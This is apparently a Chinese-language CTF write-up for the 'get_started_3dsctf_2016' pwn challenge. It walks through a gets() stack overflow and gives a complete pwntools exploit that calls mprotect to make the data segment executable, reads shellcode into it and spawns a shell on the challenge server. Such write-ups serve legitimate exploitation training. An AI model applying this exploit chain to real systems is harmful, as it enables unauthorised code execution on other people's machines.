get started 3dsctf 2016
# get started 3dsctf 2016
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/get_started_3dsctf_2016/get_started_3dsctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [esp+4h] [ebp-38h]
printf("Qual a palavrinha magica? ", v4);
gets(&v4);
return 0;
}
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
# 思路分析
- 目前信息:
- 明显的栈溢出漏洞
- No PIE
- 程序开启了NX保护
- 函数表内有
mprotect函数
- 补充:
- 在
Linux中,mprotect函数可以用来修改一段指定内存区域的保护属性,函数原型如下
- 在
int mprotect(const void *start, size_t len, int prot);
// start 为mprotect函数的第一个参数 (被修改内存的地址) 常用.got.plt/.bss起始地址
// len 为mprotect函数的第二个参数 (被修改内存的大小) 通过程序启动时查看该内存块的大小得到
// prot 为mprotect函数的第三个参数 (被修改内存的权限) 7 = 4 + 2 +1 (rwx)
1
2
3
4
2
3
4
- 思路:
- 本题存在
mprotect函数,且无PIE保护,选择栈溢出到mprotect处修改权限,在数据段直接写入shellcode并返回执行
- 本题存在
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/get_started_3dsctf_2016/get_started_3dsctf_2016'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 27774)
elf = ELF(pwnfile)
padding = 52+4
mprotect_addr = elf.symbols[b'mprotect']
read_addr = elf.symbols[b'read']
data_start = 0x80EA000
pop_3times_ret = 0x804f460
lenth = 0x2000
rwx = 7
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, data_start,lenth, rwx, read_addr, data_start, 0, data_start, 0x200])
io.sendline(payload)
payload = asm(shellcraft.sh())
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
上次更新: 2022/08/15, 00:29:49